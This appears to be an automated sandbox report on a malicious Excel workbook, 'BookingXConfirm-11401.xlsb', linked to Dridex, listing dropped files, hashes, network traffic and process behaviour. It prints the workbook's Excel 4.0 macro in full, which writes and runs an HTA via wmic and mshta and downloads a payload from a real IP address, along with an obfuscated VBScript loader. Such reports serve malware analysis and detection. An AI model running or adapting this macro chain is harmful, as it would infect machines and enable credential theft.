                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..E_a_S_c_l_b_c_I_b_p = "" & "wm" & Chr(105) & "c " & "pro" & "" & "ces" & "s c" & "" & "al" & "l " & Chr(99) & Chr(114) & "ea" & Chr(116) & "e " & Chr(34) & "ru" & "" & "ndl" & Chr(108) & "32" & ".ex" & "e " & Chr(67) & ":\" & Chr(92) & "" & Chr(80) & "rog" & "ram" & "Dat" & "a\M" & Chr(105) & Chr(99) & "ro" & Chr(115) & "of" & "t.P" & "ow" & "erS" & "hel" & "" & "l.C" & "omm" & Chr(97) & Chr(110) & "ds" & ".M" & Chr(97) & "" & "" & "na" & "ge" & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(46) & "" & "mp" & "4 S" & "nmp" & "Mg" & "" & Chr(114) & "Op" & "en" & "" & Chr(34)..Set H_r_c_u_M_K_X_C_L_D_Z_E = CreateObject("" & "MSX" & Chr(77+1-1) & Chr(76+1-1) & "2.S" & "" & Chr(101+1-1) & "rv" & Chr(101+1-1) & "rXM" & Chr(76+1-1) & "HT" & Chr(
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B01B891.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 292 x 49, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):2601
                    Entropy (8bit):7.8718311379950965
                    Encrypted:false
                    SSDEEP:48:PyquEKnMdCBOUw4IAqvZnXawzl4dtaI+WaKT8+zLTvRdiDbMFR3cV4c:NKMiIH9XawBgJaQRP7Rdiv2hmx
                    MD5:EB01290A1F4892EB42917F1F0D470C67
                    SHA1:4FF759C1D5673C51AB539C47A0393A19A2FFC3FC
                    SHA-256:19C94BF5E264275024262FCEF2B3DD452308C5839C7B362E47D95C1F8DE6E53E
                    SHA-512:B7F8B4F4F6D747456738064ED92FA3666997BEE3DA78E66E18B5D8C2FA695328DDCD157B22F64E2A379A8A28F1FA1517DA5C818DC76E941DC602B5B1BA72AE64
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR...$...1.......C'....IDATx..{PT.......s.AX...E@.%...q|P56.Fk...m...h.c......h..I&S[.5.'.%....|.F..DXV.eq.e..........>..g...;.w......mK... ......A.\ ...@...B Hl.!.$6.....A.... ...F..Ab#.. ...@...B Hl.!.$6.....A.... ...F..Ab#.. ...@.8..M_.$&...3B]Sc..rM.!......a#F..3.R.,3.a..6%v..A.....4^Yv....._..{.(\......9j.~.Yp...?L..f..{'D.....b..V.....m[.E....>..i...m.....v...;`0X.4{_.j.v..o.8..g.>.....|...(.w.z.a..]C3.W..HJn.u5.y'..Z=.].^k..rF.oV(...w....GpH.I...............|..e..iS.._l....Z.*s...,c.Sg....}../9o...."....c.WOO..x.f...X*.....oF........C.u...]\$......l..s..v.q...~.=..y7v..+.qb/.N}..W...5.E.E..-6.8.....;...'. l......O...".HD..{PPP.....0.Z....!q."..3...n;..HJqqw.P.{..}..k.......<F....f..Tzm+K......@..T..<M.?...-~.R...>2n.l...o.|.....;2*i...1S.+o...Gc..Z.,#3y.R..Y..|.........Y.K...w..m...."..|...r'O...9:.`......aI.......O..`..c...;;.i.Sr...?.x^.V.~.Y....V.WX.Y.......B8kek...8w.@@J.Q..,38s...^..H.V.6v.F.4-.Q*[...A.k....Q.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4C9255E.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 237 x 336, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):60538
                    Entropy (8bit):7.970149181563435
                    Encrypted:false
                    SSDEEP:1536:2PFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbD:RFzIsj8aipSW4vHREQ4iZKUbD
                    MD5:ABC5AD9147D307B1DADB93C7AF297C5A
                    SHA1:3658C7DDFA698CDADD1D24C6C8DC4ECF7A09D9E3
                    SHA-256:AEF2CEDE45970E5F0DCC40514D38B0D707A87FBC5943B61763EF20B4A8C0573F
                    SHA-512:D6F7C18AB4E132EAA0620FD83F7EE6C21F2B16ECA70267770C6F8499B18DEE24B3849E9ADDFAA76DA1A4CB13BDB81F1F49DF77CC3BF0146EE68E0CE6860839AA
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.......P.....Sn.....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                    C:\Users\user\Desktop\~$BookingXConfirm-11401.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.909258766473029
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:BookingXConfirm-11401.xlsb
                    File size:92298
                    MD5:6b7bad3cea00c7bc8af7e7d0143c5928
                    SHA1:8c8c8bfe0d0f61dec2a2083488ff709555b79f0a
                    SHA256:2131544f0cfa54af9bdd61cd990af05f1a4483df67d6e6d76ece14cb9cc550f6
                    SHA512:63e25739a283e40cb53bdd3e9fecc48f0c91d509cdc6fadb3bb45991cd11990fb98c7495e581aff8fd66e475564755342504c27d46be4d3df3417cf195c87874
                    SSDEEP:1536:UWBPFFxgFzx5YVqHS2YzayhpSW4vHR05Q4r5UZKUbxOHYR5mcB/HE8kgFgd2J:VsFzIsj8aipSW4vHREQ4iZKUbwo9HEnK
                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "BookingXConfirm-11401.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,173,=FOPEN("C:\ProgramData\BnnsIhc.rtf", 1+1+1+0+0)
                    1,173,=B5451+A3720
                    5,173,=C150+A177
                    6,173,=A9691+A4439
                    8,173,=C1912+C601
                    13,173,=A2163+D8103
                    14,173,=ALERT("Error! Sending report to Microsoft...")
                    15,173,=D9829+D2617
                    17,173,=C4409+A7682
                    18,173,=C4078+B1572
                    19,173,=B56+B6622
                    20,173,=D6491+D5474
                    23,173,=D6128+B8760
                    24,173,=C81+A1680
                    25,173,=D4988+C9367
                    26,173,=D2935+C5867
                    27,173,=C6078+D7687
                    28,173,=FOR.CELL("SDvRQdJgefypX",Sheet1!CR168:DL401, TRUE)
                    29,173,=B8887+B8538
                    32,173,=B7136+C3240
                    34,173,=A8391+C650
                    35,173,=D7485+B2750
                    37,173,=D8482+B7769
                    40,173,=FWRITE(0,CHAR(SDvRQdJgefypX))
                    43,173,=A3374+A8421
                    45,173,=A866+C9680
                    46,173,=C3769+A50
                    48,173,=C8986+C7745
                    49,173,=D8026+A883
                    50,173,=A43+B9771
                    52,173,=NEXT()
                    57,173,=C457+C1770
                    61,173,=D9781+C5764
                    62,173,=EXEC("wmic.exe proc"&CHAR(101+1-1)&"ss call create 'mshta C:\\ProgramData\BnnsIhc.rtf' ")
                    66,173,=C6953+B1615
                    70,173,=B3240+C7234
                    72,173,=B2377+C6398
                    75,173,=C9348+B7607
                    76,173,=D3337+A1389
                    77,173,=CALL("urlmon", "URLDownloadToFileA","JJCCJJ", 0, "http://103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA", "C:\ProgramData\YSJlSRsQJvJC.txt",0,0)
                    81,173,=A3069+B6289
                    83,173,=B6321+A6468
                    85,173,=C1251+A2935
                    87,173,=C1478+C2916
                    90,173,=B2372+B2051
                    91,173,=FOPEN("C:\ProgramData\YSJlSRsQJvJC.txt",1)
                    92,173,=B8030+B2503
                    94,173,=A7738+A4402
                    96,173,=C7836+D7807
                    99,173,=C2183+A1987
                    101,173,=C7942+B3595
                    102,173,=SEND.MAIL(EVALUATE(FREAD(FR92,255)))
                    103,173,=B8897+B7288
                    106,173,=B5065+B6018
                    108,173,=B8799+A2792
                    109,173,=B3122+D9125
                    111,173,=B9717+C717
                    113,173,=C5823+A2467
                    114,173,=D4623+B2209
                    115,173,=C9443+C2576
                    116,173,=RETURN()
                    

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    11/25/21-08:05:55.601429TCP2034532ET TROJAN Dridex CnC Request - Spam/Worm Component491678080192.168.2.22103.117.180.99

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 25, 2021 08:05:55.434501886 CET491678080192.168.2.22103.117.180.99
                    Nov 25, 2021 08:05:55.600804090 CET808049167103.117.180.99192.168.2.22
                    Nov 25, 2021 08:05:55.600922108 CET491678080192.168.2.22103.117.180.99
                    Nov 25, 2021 08:05:55.601428986 CET491678080192.168.2.22103.117.180.99
                    Nov 25, 2021 08:05:55.767266035 CET808049167103.117.180.99192.168.2.22
                    Nov 25, 2021 08:05:56.079843998 CET808049167103.117.180.99192.168.2.22
                    Nov 25, 2021 08:05:56.079946995 CET491678080192.168.2.22103.117.180.99
                    Nov 25, 2021 08:07:11.081399918 CET808049167103.117.180.99192.168.2.22
                    Nov 25, 2021 08:07:11.081598043 CET491678080192.168.2.22103.117.180.99

                    HTTP Request Dependency Graph

                    • 103.117.180.99:8080

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249167103.117.180.998080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    Nov 25, 2021 08:05:55.601428986 CET0OUTGET /PJ3ZQWVJPYCYDCA9A6Q2Y6YA HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 103.117.180.99:8080
                    Connection: Keep-Alive
                    Nov 25, 2021 08:05:56.079843998 CET0INHTTP/1.1 404 Not Found
                    Server: nginx/1.0.15
                    Date: Thu, 25 Nov 2021 07:05:55 GMT
                    Content-Type: text/plain; charset=utf-8
                    Connection: keep-alive
                    Content-Length: 9
                    Data Raw: 4e 6f 74 20 46 6f 75 6e 64
                    Data Ascii: Not Found


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:08:06:13
                    Start date:25/11/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f830000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:08:06:38
                    Start date:25/11/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf'
                    Imagebase:0xffa70000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:08:06:39
                    Start date:25/11/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\\ProgramData\BnnsIhc.rtf
                    Imagebase:0x13faf0000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >